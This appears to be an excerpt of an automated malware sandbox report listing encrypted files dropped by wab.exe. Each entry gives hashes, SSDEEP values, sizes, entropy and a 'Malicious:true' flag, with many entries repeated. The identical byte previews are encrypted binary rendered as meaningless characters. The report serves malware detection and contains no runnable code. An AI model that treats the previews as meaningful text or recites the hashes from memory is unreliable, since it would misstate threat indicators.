                                                                                SHA1:7D2BC0348AF6AC258A4691AD0A0F4B9C6FB54BA0
                                                                                SHA-256:4F6396B0EAD9EC417EA1564102283B631285AF274D3631BC3AB739F0EAB0FFC6
                                                                                SHA-512:F006B7A5A0C9759CC9EF7A32777E8737A522CBBB0BE84088D79413A2373978FAE4B375B2EC7DBA930729325440B0F2BE86BD79B60AFC5E78C7DE21E3FEAAC146
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):171374
                                                                                Entropy (8bit):7.998959049164971
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNud5rD4c1+nbfqa:ZIc0afzkI9WaXNhFj255YcLqdKM+nbx
                                                                                MD5:A04202570F80E37AFD225559ABD2C769
                                                                                SHA1:11F662ED27254E26AF16F6FA3C94DA4B8CD509A8
                                                                                SHA-256:823DB8ACD55ABA972BBCD0C57D6E7DAA57D5FD7A5369ADFBF1889EC100CE33A4
                                                                                SHA-512:411022F3B201D3959F8BF1D019B52ACB96E9AECB4630A829B418EEFB1AD55BF8389040E114A6E4DD14C35DDC049ACCEC358E4B93E322AD6E3AE3E912B90AABFD
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):171322
                                                                                Entropy (8bit):7.998909408632357
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNud5rUh+xbt:ZIc0afzkI9WaXNhFj255YcLqdOh+xbt
                                                                                MD5:8D4AE2462AFF8CA37EB2EF25F3CBA16A
                                                                                SHA1:B5F540522C27DE2686D066F93FA85AA1343D5630
                                                                                SHA-256:CD94BF5DE455ABDA3D8C2FAFC86405D4679AFACCB309AACDFB787CBB1DB1F047
                                                                                SHA-512:B1BC86478E6640C0E4523E84E1EB98B98B2323F04DCAA71EC08C8D67F73C873E2FFD286015FD44910247158935CEA74B918ED7FFF66A447DC69DC802460E3CF7
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):171322
                                                                                Entropy (8bit):7.998909408632357
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNud5rUh+xbt:ZIc0afzkI9WaXNhFj255YcLqdOh+xbt
                                                                                MD5:8D4AE2462AFF8CA37EB2EF25F3CBA16A
                                                                                SHA1:B5F540522C27DE2686D066F93FA85AA1343D5630
                                                                                SHA-256:CD94BF5DE455ABDA3D8C2FAFC86405D4679AFACCB309AACDFB787CBB1DB1F047
                                                                                SHA-512:B1BC86478E6640C0E4523E84E1EB98B98B2323F04DCAA71EC08C8D67F73C873E2FFD286015FD44910247158935CEA74B918ED7FFF66A447DC69DC802460E3CF7
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):171322
                                                                                Entropy (8bit):7.998909408632357
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNud5rUh+xbt:ZIc0afzkI9WaXNhFj255YcLqdOh+xbt
                                                                                MD5:8D4AE2462AFF8CA37EB2EF25F3CBA16A
                                                                                SHA1:B5F540522C27DE2686D066F93FA85AA1343D5630
                                                                                SHA-256:CD94BF5DE455ABDA3D8C2FAFC86405D4679AFACCB309AACDFB787CBB1DB1F047
                                                                                SHA-512:B1BC86478E6640C0E4523E84E1EB98B98B2323F04DCAA71EC08C8D67F73C873E2FFD286015FD44910247158935CEA74B918ED7FFF66A447DC69DC802460E3CF7
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):171374
                                                                                Entropy (8bit):7.998959049164971
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNud5rD4c1+nbfqa:ZIc0afzkI9WaXNhFj255YcLqdKM+nbx
                                                                                MD5:A04202570F80E37AFD225559ABD2C769
                                                                                SHA1:11F662ED27254E26AF16F6FA3C94DA4B8CD509A8
                                                                                SHA-256:823DB8ACD55ABA972BBCD0C57D6E7DAA57D5FD7A5369ADFBF1889EC100CE33A4
                                                                                SHA-512:411022F3B201D3959F8BF1D019B52ACB96E9AECB4630A829B418EEFB1AD55BF8389040E114A6E4DD14C35DDC049ACCEC358E4B93E322AD6E3AE3E912B90AABFD
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):171374
                                                                                Entropy (8bit):7.998959049164971
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNud5rD4c1+nbfqa:ZIc0afzkI9WaXNhFj255YcLqdKM+nbx
                                                                                MD5:A04202570F80E37AFD225559ABD2C769
                                                                                SHA1:11F662ED27254E26AF16F6FA3C94DA4B8CD509A8
                                                                                SHA-256:823DB8ACD55ABA972BBCD0C57D6E7DAA57D5FD7A5369ADFBF1889EC100CE33A4
                                                                                SHA-512:411022F3B201D3959F8BF1D019B52ACB96E9AECB4630A829B418EEFB1AD55BF8389040E114A6E4DD14C35DDC049ACCEC358E4B93E322AD6E3AE3E912B90AABFD
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):171374
                                                                                Entropy (8bit):7.998959049164971
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNud5rD4c1+nbfqa:ZIc0afzkI9WaXNhFj255YcLqdKM+nbx
                                                                                MD5:A04202570F80E37AFD225559ABD2C769
                                                                                SHA1:11F662ED27254E26AF16F6FA3C94DA4B8CD509A8
                                                                                SHA-256:823DB8ACD55ABA972BBCD0C57D6E7DAA57D5FD7A5369ADFBF1889EC100CE33A4
                                                                                SHA-512:411022F3B201D3959F8BF1D019B52ACB96E9AECB4630A829B418EEFB1AD55BF8389040E114A6E4DD14C35DDC049ACCEC358E4B93E322AD6E3AE3E912B90AABFD
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):171322
                                                                                Entropy (8bit):7.998909408632357
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNud5rUh+xbt:ZIc0afzkI9WaXNhFj255YcLqdOh+xbt
                                                                                MD5:8D4AE2462AFF8CA37EB2EF25F3CBA16A
                                                                                SHA1:B5F540522C27DE2686D066F93FA85AA1343D5630
                                                                                SHA-256:CD94BF5DE455ABDA3D8C2FAFC86405D4679AFACCB309AACDFB787CBB1DB1F047
                                                                                SHA-512:B1BC86478E6640C0E4523E84E1EB98B98B2323F04DCAA71EC08C8D67F73C873E2FFD286015FD44910247158935CEA74B918ED7FFF66A447DC69DC802460E3CF7
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):171322
                                                                                Entropy (8bit):7.998909408632357
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNud5rUh+xbt:ZIc0afzkI9WaXNhFj255YcLqdOh+xbt
                                                                                MD5:8D4AE2462AFF8CA37EB2EF25F3CBA16A
                                                                                SHA1:B5F540522C27DE2686D066F93FA85AA1343D5630
                                                                                SHA-256:CD94BF5DE455ABDA3D8C2FAFC86405D4679AFACCB309AACDFB787CBB1DB1F047
                                                                                SHA-512:B1BC86478E6640C0E4523E84E1EB98B98B2323F04DCAA71EC08C8D67F73C873E2FFD286015FD44910247158935CEA74B918ED7FFF66A447DC69DC802460E3CF7
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):171322
                                                                                Entropy (8bit):7.998909408632357
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNud5rUh+xbt:ZIc0afzkI9WaXNhFj255YcLqdOh+xbt
                                                                                MD5:8D4AE2462AFF8CA37EB2EF25F3CBA16A
                                                                                SHA1:B5F540522C27DE2686D066F93FA85AA1343D5630
                                                                                SHA-256:CD94BF5DE455ABDA3D8C2FAFC86405D4679AFACCB309AACDFB787CBB1DB1F047
                                                                                SHA-512:B1BC86478E6640C0E4523E84E1EB98B98B2323F04DCAA71EC08C8D67F73C873E2FFD286015FD44910247158935CEA74B918ED7FFF66A447DC69DC802460E3CF7
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):176948
                                                                                Entropy (8bit):7.998950233933706
                                                                                Encrypted:true
                                                                                SSDEEP:3072:NtTSyK/cxWNor6JCo/pBbkEczNofYiNN9XpzGuxS542WtI2I0bnofJ41JEj8UUYX:N/ovJzxBIEcgYa9XdxINWtI2I0SJ6Edr
                                                                                MD5:5738862CA2111E0892B7B98F620579E9
                                                                                SHA1:1C559A02243E9F1EA7EC794D55E0E1F46E4FD241
                                                                                SHA-256:A42CD6EBB4CC7C067E4DBE2A8B6D2D8419EE47AF1E1AF933CDA90C074A353FDC
                                                                                SHA-512:37D224E52708DAEC5823784107CBD22A21282CABEB9F5FC374059CED946811DE4D265366B2971FD1D9646AF4C3BC7771BE009E24100C314D0E40CB384062C4A5
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):177546
                                                                                Entropy (8bit):7.998958082955815
                                                                                Encrypted:true
                                                                                SSDEEP:3072:qYkAxLdbGyY2ihg2KTO0ttUIq9OY+bhiD8PfEIOny1MRVbegY8Ya/NyKtsXt5Ctq:qYb1JPecOQ29jw3EByofea/NyaQt5MIV
                                                                                MD5:9358EEF599B1FE71B6C214054254DC81
                                                                                SHA1:86C0A2FABE7CCB6391020EF964A3381F8F60A4A5
                                                                                SHA-256:752015F27A2A2429433ADC75782D0DB8F40B8CB945E5B5924474CB40E2809F1C
                                                                                SHA-512:9A3252A5CF69C1AF57B15296CF7977BBE814ACBB08D26A74461FF415AFD0F19995909C3A73173AFF6C9260AA2B6FFB278CACFB95C94C9E5EE0789CCEFFA13392
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):169555
                                                                                Entropy (8bit):7.998856953208157
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNudhCu4Q3zVlCJm:ZIc0afzkI9WaXNhFj255YcLqdhN735am
                                                                                MD5:3592E4D62BF9B5719D72568AA3C397DD
                                                                                SHA1:20FA7919C46CA2901DD856927BE9171CDAA60264
                                                                                SHA-256:3007C75E8539EF96458FA012F1E855FBAF48D8D51226D34F32A14723FA23CAFC
                                                                                SHA-512:40D04D66337D447377AE01675A62DAE0CA400C5B0F44B601B0CAF511B50D5F6785F531A79A691437F23C53677C17F9ACE1921969FEF435979C4E7222A30FF086
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):169555
                                                                                Entropy (8bit):7.998856953208157
                                                                                Encrypted:true
